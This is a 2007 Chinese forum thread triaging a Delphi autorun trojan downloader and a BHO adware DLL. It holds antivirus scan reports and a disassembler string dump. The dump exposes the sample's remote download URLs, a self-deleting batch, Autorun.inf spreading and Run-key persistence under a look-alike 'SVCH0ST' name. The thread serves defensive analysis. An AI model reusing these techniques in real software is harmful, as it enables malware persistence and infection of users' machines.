360报的，大家帮忙分析一下071cb1 4d511e

显示全部楼层 · 发表于 2007-9-6 16:52:16

C:/WINDOWS/system32/SERVICS.EXE  Trojan/Win32.AutoRun.b

C:/WINDOWS/system32/XQDBHO.dll  Adware/Win32.Agent.nxa
附上virscan扫描结果
1：SERVICS.EXE扫描结果：
VirSCAN.org Scanned Report :
Scanned time : 2007/09/06 16:36:30 (CST)
Scanner results: 45%的杀软(14/31)报告发现病毒
File Name    : SERVICS.rar
File Size    : 147027 byte
File Type    : RAR archive data, v1d, os
MD5          : 071cb1a306a1783810c393e6e39ade97
SHA1          : b0dcc1c2ca0b2bc926eba3bb103c638a6ed0a747
Online report  : http://virscan.org/report.php?id=071cb1a306a1783810c393e6e39ade97
Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.0.0.123    2007.09.05       2007-09-05  3.75 -
小红伞       7.6.0.5       6.39.1.96       2007-09-06  2.37 TR/Delphi.Downloader.Gen
Arcavir       1.0.4          200709051809    2007-09-05  1.19 -
AVAST       1.0.8          000773-0       2007-09-05  3.04 -
AVG          7.5.48.442    269.13.6/991    2007-09-05  1.56 -
BitDefender 7.60825.862329  7.14640          2007-09-06  3.17 Trojan.Delphi.Downloader.ZE
CA (VET)    8.4.0.24       31.1.5114       2007-09-06  0.91 -
ClamAV       0.91.1       4169             2007-09-06  0.09 -
Comodo       2.11          2.0.0.276       2007-09-06  1.04 -
大蜘蛛       4.33          2007.09.06       2007-09-06  6.19 -
ewido       4.0.0.2       2007.09.05       2007-09-05  2.86 -
冰岛杀毒    3.16.16       2007.09.06       2007-09-06  8.48 W32/NewMalware-LSU-based!Maximus
F-SECURE    5.51.6100    2007.09.05.08    2007-09-05  2.66 -
IKARUS       T3.1.1.12    2007.09.06.69456  2007-09-06  2.51 Trojan.Delphi.Downloader.ZE
江民杀毒    10.00.650    2007.09.04       2007-09-04  0.81 -
卡巴斯基    5.5.10       2007.09.06       2007-09-06  0.11 -
金山毒霸    2007.6.20.249 2007.9.6       2007-09-06  1.81 Win32.Troj.AutoRun.b.585216
迈克菲       5.2.00       5113             2007-09-05  0.87 New Malware.aq
MKS_VIR       2.01          2007.09.05       2007-09-05  1.88 -
NOD32       2.70.8       2508             2007-09-06  2.36 a variant of Win32/AutoRun.D virus
诺曼          5.91.07       5.90             2007-09-05  2.78 W32/Hupigon.gen154
熊猫卫士    9.04.03.0001 2007.09.05       2007-09-05  3.34 Suspicious file
趋势          8.500-1001    4.697.00       2007-09-05  0.05 -
QuickHeal    9.00          2007.09.05       2007-09-05  2.35 Suspicious - DNAScan
瑞星          19.0          19.39.31.00    2007-09-06  1.89 -
SOPHOS       2.49.1       4.21             2007-09-06  2.64 Mal/Packer
赛门铁克    1.3.0.24       20070905.023    2007-09-05  3.05 -
nProtect    2007-09-06.00 43495          2007-09-06  14.00  Trojan.Delphi.Downloader.ZE
The Hacker    6.1.9          v00178          2007-09-05  0.82 W32/Behav-Heuristic-063
VBA32       3.12.2.4       20070906.0441    2007-09-06  2.19 Downloader.Banload.15 (paranoid heuristics) (suspicious)
VirusBuster 4.3.19:9       9.101.2/11.0    2007-09-05  1.12 -
2：XQDBHO.dll扫描结果

VirSCAN.org Scanned Report :
Scanned time : 2007/09/06 16:39:01 (CST)
Scanner results: 26%的杀软(8/31)报告发现病毒
File Name    : XQDBHO.rar
File Size    : 213251 byte
File Type    : RAR archive data, v1d, os
MD5          : 4d511e2f0d6e9e751f76d88dda7c8523
SHA1          : fb6a5664bbc8037c44bd1091a132d4bde60d9176
Online report  : http://virscan.org/report.php?id=4d511e2f0d6e9e751f76d88dda7c8523
Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.0.0.123    2007.09.05       2007-09-05  3.96 -
小红伞       7.6.0.5       6.39.1.96       2007-09-06  2.57 TR/Small.216667
Arcavir       1.0.4          200709051809    2007-09-05  1.47 -
AVAST       1.0.8          000773-0       2007-09-05  3.07 -
AVG          7.5.48.442    269.13.6/991    2007-09-05  1.57 -
BitDefender 7.60825.862329  7.14640          2007-09-06  3.29 -
CA (VET)    8.4.0.24       31.1.5114       2007-09-06  0.81 -
ClamAV       0.91.1       4169             2007-09-06  0.10 -
Comodo       2.11          2.0.0.276       2007-09-06  1.29 -
大蜘蛛       4.33          2007.09.06       2007-09-06  5.15 -
ewido       4.0.0.2       2007.09.05       2007-09-05  4.40 -
冰岛杀毒    3.16.16       2007.09.06       2007-09-06  9.93 -
F-SECURE    5.51.6100    2007.09.05.08    2007-09-05  0.12 -
IKARUS       T3.1.1.12    2007.09.06.69456  2007-09-06  14.28  suspicious(level 60)
江民杀毒    10.00.650    2007.09.04       2007-09-04  0.85 -
卡巴斯基    5.5.10       2007.09.06       2007-09-06  0.19 -
金山毒霸    2007.6.20.249 2007.9.6       2007-09-06  1.29 -
迈克菲       5.2.00       5113             2007-09-05  0.99 New Malware.aq
MKS_VIR       2.01          2007.09.05       2007-09-05  2.59 -
NOD32       2.70.8       2508             2007-09-06  3.43 -
诺曼          5.91.07       5.90             2007-09-05  4.03 W32/Hupigon.gen154
熊猫卫士    9.04.03.0001 2007.09.05       2007-09-05  6.03 -
趋势          8.500-1001    4.697.00       2007-09-05  0.05 -
QuickHeal    9.00          2007.09.05       2007-09-05  4.10 -
瑞星          19.0          19.39.31.00    2007-09-06  3.39 Adware.Win32.Agent.nxa
SOPHOS       2.49.1       4.21             2007-09-06  2.74 Mal/Behav-056
赛门铁克    1.3.0.24       20070905.023    2007-09-05  0.37 -
nProtect    2007-09-06.00 43495          2007-09-06  19.97  -
The Hacker    6.1.9          v00179          2007-09-06  1.20 W32/Behav-Heuristic-063
VBA32       3.12.2.4       20070906.0441    2007-09-06  2.95 -
VirusBuster 4.3.19:9       9.101.2/11.0    2007-09-05  1.21 Packed/NSPack

[ 本帖最后由 promised 于 2007-9-6 16:54 编辑 ]

显示全部楼层 · 发表于 2007-9-6 16:53:10

MicroVita AntiSpyware 100 C
_____________________________________________

         风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]
               http://221.10.254.214/
----------------------------------------------
开始扫描……

正在检查启动……
[C:\Documents and Settings\Administrator\桌面\virus\SERVICS\SERVICS.EXE]
                  …………引擎[2]发现病毒:Win32.NkHack.BDX.A
[C:\Documents and Settings\Administrator\桌面\virus\SERVICS\XQDBHO.dll]
                  …………引擎[2]发现病毒:Win32.NkHack.BDX.A
文件数:2 病毒数:2  比重:1
OK  扫描完毕！

显示全部楼层 · 发表于 2007-9-6 16:59:41

delphi编的exe
autorun一个
配套的svhost是同一个样本,md5不同

0044E9AF MOV EDX,SERVICSu.0044EAE0 ASCII "SCVH0ST.EXE"
0044E9C7 PUSH SERVICSu.0044EAEC ASCII "http://www.99999999999.com.cn/SCVH0ST.EXE"
0044E9E1 PUSH SERVICSu.0044EB18 ASCII "http://www.99999999999.com.cn/SERVICS.EXE"
0044EA03 MOV EDX,SERVICSu.0044EB4C ASCII "delself.bat"
0044EA23 PUSH SERVICSu.0044EB60 ASCII "start "
0044EA2A PUSH SERVICSu.0044EB74 ASCII " /s -s "
0044EA5A MOV EDX,SERVICSu.0044EB84 ASCII "del %0"
0044EA8D MOV EAX,SERVICSu.0044EB4C ASCII "delself.bat"
0044EAE0 ASCII "SCVH0ST.EXE",0
0044EAEC ASCII "http://www.99999"
0044EAFC ASCII "999999.com.cn/SC"
0044EB0C ASCII "VH0ST.EXE",0
0044EB18 ASCII "http://www.99999"
0044EB28 ASCII "999999.com.cn/SE"
0044EB38 ASCII "RVICS.EXE",0
0044EB4C ASCII "delself.bat",0
0044EB60 ASCII "start ",0
0044EB74 ASCII " /s -s ",0
0044EB84 ASCII "del %0",0
0044EDAC MOV EDX,SERVICSu.0044EE58 ASCII "c:\windows\system32"
0044EDF9 MOV ECX,SERVICSu.0044EE74 ASCII "\system32"
0044EE58 ASCII "c:\windows\syste"
0044EE68 ASCII "m32",0
0044EE74 ASCII "\system32",0
0044EF38 MOV EDX,SERVICSu.0044F020 ASCII "UmFyIRoHAM+QcwAADQAAAAAAAAAjrHQgkj4AggMAAP0JAAACMWjcnu10cDMdAAAAAMxkAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
0044EF45 MOV EDX,SERVICSu.0044F0A8 ASCII "A03ABfghcnEfudadsfdgtertgsdsAdfgdfSDFdfgDGFdewrTfgfhjGTTrAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
0044EF52 MOV EDX,SERVICSu.0044F0A8 ASCII "A03ABfghcnEfudadsfdgtertgsdsAdfgdfSDFdfgDGFdewrTfgfhjGTTrAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
0044EF5F MOV EDX,SERVICSu.0044F124 ASCII "sjfskjfskjfsdsdueruiweuruiiuxzcyseyweryuxyuxyuyutweyrtyuyutwyerwewlkjlrwjrlkewjklewrjlkwejrlkw333333kk3kk33kk3k3k3"
0044EF6C MOV EDX,SERVICSu.0044F1A0 ASCII "4564545645454deddsfdsewrtewtdfdfgdgdfgert43tfdgdfgdg4t5frfdsddfdgdfdgdfddfgfdgfdgfgryteytryytuytyuiuoiopopoo333333"
0044EF79 MOV EDX,SERVICSu.0044F21C ASCII "6sd576sd576f576s56ssfdsfz6xc5xz6c65xzc65xz56zc56zxczxcxz65cxz65cz76x5z6x576xzc5zx76c5zx675xz675cxz65c76xz5z76x5x66"
0044EF86 MOV EDX,SERVICSu.0044F298 ASCII "n435mmnb45mn43b5n54b53n54m45nm45nm43nm54bn43b43nb4nb43nmb4nm43b5bnm4b4nm43m34nm34nm34n343nm4n3m4n34nm34nm34n3m3mmm"
0044EF93 MOV EDX,SERVICSu.0044F314 ASCII "3453535435dddss435345ju35j345k34kj53k5j3k4j5k34j534kj53k4j5k3535j35mm2xslkksaksasdkskdsdemnm34wBMAsHawEAwZUMzM082B"
0044EFA0 MOV EDX,SERVICSu.0044F390 ASCII "SDFSDF43wSDF$XZ#@$#@$WERWER@#$#@$SSA$#@%@#%SFSFSFSJHJIPOIPOIPOIPOIZCXZCXREWRW#$%%^*&(**&(*9834wBMAsHawEAwZUMzM082B"
0044EFAD MOV EDX,SERVICSu.0044F314 ASCII "3453535435dddss435345ju35j345k34kj53k5j3k4j5k34j534kj53k4j5k3535j35mm2xslkksaksasdkskdsdemnm34wBMAsHawEAwZUMzM082B"
0044F020 ASCII "UmFyIRoHAM+QcwAA"
0044F030 ASCII "DQAAAAAAAAAjrHQg"
0044F040 ASCII "kj4AggMAAP0JAAAC"
0044F050 ASCII "MWjcnu10cDMdAAAA"
0044F060 ASCII "AMxkAIAgAAEFudGl"
0044F070 ASCII "jb2RlXGFudGljb2R"
0044F080 ASCII "lLkFTTQABwBMAsHa"
0044F090 ASCII "wEAwZUMzM082B",0
0044F0A8 ASCII "A03ABfghcnEfudad"
0044F0B8 ASCII "sfdgtertgsdsAdfg"
0044F0C8 ASCII "dfSDFdfgDGFdewrT"
0044F0D8 ASCII "fgfhjGTTrAIAgAAE"
0044F0E8 ASCII "FudGljb2RlXGFudG"
0044F0F8 ASCII "ljb2RlLkFTTQABwB"
0044F108 ASCII "MAsHawEAwZUMzM08"
0044F118 ASCII "2B",0
0044F124 ASCII "sjfskjfskjfsdsdu"
0044F134 ASCII "eruiweuruiiuxzcy"
0044F144 ASCII "seyweryuxyuxyuyu"
0044F154 ASCII "tweyrtyuyutwyerw"
0044F164 ASCII "ewlkjlrwjrlkewjk"
0044F174 ASCII "lewrjlkwejrlkw33"
0044F184 ASCII "3333kk3kk33kk3k3"
0044F194 ASCII "k3",0
0044F1A0 ASCII "4564545645454ded"
0044F1B0 ASCII "dsfdsewrtewtdfdf"
0044F1C0 ASCII "gdgdfgert43tfdgd"
0044F1D0 ASCII "fgdg4t5frfdsddfd"
0044F1E0 ASCII "gdfdgdfddfgfdgfd"
0044F1F0 ASCII "gfgryteytryytuyt"
0044F200 ASCII "yuiuoiopopoo3333"
0044F210 ASCII "33",0
0044F21C ASCII "6sd576sd576f576s"
0044F22C ASCII "56ssfdsfz6xc5xz6"
0044F23C ASCII "c65xzc65xz56zc56"
0044F24C ASCII "zxczxcxz65cxz65c"
0044F25C ASCII "z76x5z6x576xzc5z"
0044F26C ASCII "x76c5zx675xz675c"
0044F27C ASCII "xz65c76xz5z76x5x"
0044F28C ASCII "66",0
0044F298 ASCII "n435mmnb45mn43b5"
0044F2A8 ASCII "n54b53n54m45nm45"
0044F2B8 ASCII "nm43nm54bn43b43n"
0044F2C8 ASCII "b4nb43nmb4nm43b5"
0044F2D8 ASCII "bnm4b4nm43m34nm3"
0044F2E8 ASCII "4nm34n343nm4n3m4"
0044F2F8 ASCII "n34nm34nm34n3m3m"
0044F308 ASCII "mm",0
0044F314 ASCII "3453535435dddss4"
0044F324 ASCII "35345ju35j345k34"
0044F334 ASCII "kj53k5j3k4j5k34j"
0044F344 ASCII "534kj53k4j5k3535"
0044F354 ASCII "j35mm2xslkksaksa"
0044F364 ASCII "sdkskdsdemnm34wB"
0044F374 ASCII "MAsHawEAwZUMzM08"
0044F384 ASCII "2B",0
0044F390 ASCII "SDFSDF43wSDF$XZ#"
0044F3A0 ASCII "@$#@$WERWER@#$#@"
0044F3B0 ASCII "$SSA$#@%@#%SFSFS"
0044F3C0 ASCII "FSJHJIPOIPOIPOIP"
0044F3D0 ASCII "OIZCXZCXREWRW#$%"
0044F3E0 ASCII "%^*&(**&(*9834wB"
0044F3F0 ASCII "MAsHawEAwZUMzM08"
0044F400 ASCII "2B",0
0044F471 PUSH SERVICSu.0044F6A8 ASCII ":"
0044F4A9 MOV EDX,SERVICSu.0044F6B4 ASCII ":\SERVICS.EXE"
0044F4D3 MOV EDX,SERVICSu.0044F6CC ASCII ":\SCVH0ST.EXE"
0044F575 MOV ECX,SERVICSu.0044F6E4 ASCII ":Autorun.inf"
0044F5BA MOV ECX,SERVICSu.0044F6FC ASCII "open"
0044F5BF MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
0044F5D1 MOV ECX,SERVICSu.0044F71C ASCII "Shellexecute"
0044F5D6 MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
0044F5E8 MOV ECX,SERVICSu.0044F734 ASCII "shell\Auto\command"
0044F5ED MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
0044F632 PUSH SERVICSu.0044F748 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
0044F650 PUSH SERVICSu.0044F784 ASCII "NoDriveTypeAutoRun"
0044F6A8 ASCII ":",0
0044F6B4 ASCII ":\SERVICS.EXE",0
0044F6CC ASCII ":\SCVH0ST.EXE",0
0044F6E4 ASCII ":Autorun.inf",0
0044F6FC ASCII "open",0
0044F70C ASCII "AutoRun",0
0044F71C ASCII "Shellexecute",0
0044F734 ASCII "shell\Auto\comma"
0044F744 ASCII "nd",0
0044F748 ASCII "Software\Microso"
0044F758 ASCII "ft\Windows\Curre"
0044F768 ASCII "ntVersion\Polici"
0044F778 ASCII "es\Explorer",0
0044F784 ASCII "NoDriveTypeAutoR"
0044F794 ASCII "un",0
0044F7ED PUSH SERVICSu.0044F98C ASCII "SCVH0ST"
0044F869 MOV EDX,SERVICSu.0044F99C ASCII "SCVH0ST.EXE"
0044F87A MOV EDX,SERVICSu.0044F9B0 ASCII "SERVICS.EXE"
0044F88B MOV EDX,SERVICSu.0044F99C ASCII "SCVH0ST.EXE"
0044F98C ASCII "SCVH0ST",0
0044F99C ASCII "SCVH0ST.EXE",0
0044F9B0 ASCII "SERVICS.EXE",0
0044F9C4 ASCII "",0
0044FA21 MOV EDX,SERVICSu.0044FB78 ASCII "CLSID\{A692062A-4782-461B-BE98-B520F01F96FC}\InprocServer32"
0044FA33 MOV EAX,SERVICSu.0044FBBC ASCII ".dll"
0044FA5C MOV EDX,SERVICSu.0044FBCC ASCII "\XQDBHO5.exe"
0044FA81 MOV EDX,SERVICSu.0044FBCC ASCII "\XQDBHO5.exe"
0044FAB1 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
0044FAB6 MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0044FAF9 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
0044FAFE MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0044FB20 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
0044FB25 MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0044FB78 ASCII "CLSID\{A692062A-"
0044FB88 ASCII "4782-461B-BE98-B"
0044FB98 ASCII "520F01F96FC}\Inp"
0044FBA8 ASCII "rocServer32",0
0044FBBC ASCII ".dll",0
0044FBCC ASCII "\XQDBHO5.exe",0
0044FBE4 ASCII "SVCH0ST",0
0044FBF4 ASCII "Software\Microso"
0044FC04 ASCII "ft\Windows\Curre"
0044FC14 ASCII "ntVersion\Run",0

复制代码

[ 本帖最后由 promised 于 2007-9-6 17:02 编辑 ]

显示全部楼层 · 发表于 2007-9-6 17:00:41

360显灵了

显示全部楼层 · 发表于 2007-9-6 17:02:12

你这两个文件放到非系统盘，看看360还报不

显示全部楼层 · 发表于 2007-9-6 17:04:10

应该是不报了

显示全部楼层 · 发表于 2007-9-6 17:06:50

360有特征查杀的，不光是文件名

显示全部楼层 · 发表于 2007-9-6 17:07:59

试了，还是报一样的结果

显示全部楼层 · 发表于 2007-9-6 17:36:46

F:\9.6\SERVICS.rar >>RAR >>SERVICS.EXE - Win32/AutoRun.D 病毒的变种

显示全部楼层 · 发表于 2007-9-6 22:54:28

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\XQDBHO.rar'
C:\Documents and Settings\Administrator\My Documents\
  XQDBHO.rar
[0] Archive type: RAR
--> XQDBHO.dll
      [DETECTION] Is the Trojan horse TR/Small.216667
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was deleted!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\SERVICS.rar'
C:\Documents and Settings\Administrator\My Documents\
  SERVICS.rar
[0] Archive type: RAR
--> SERVICS.EXE
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was deleted!

360报的，大家帮忙分析一下071cb1 4d511e

本帖子中包含更多资源

本帖子中包含更多资源

回复 5楼 EQ2 的帖子

回复 5楼 EQ2 的帖子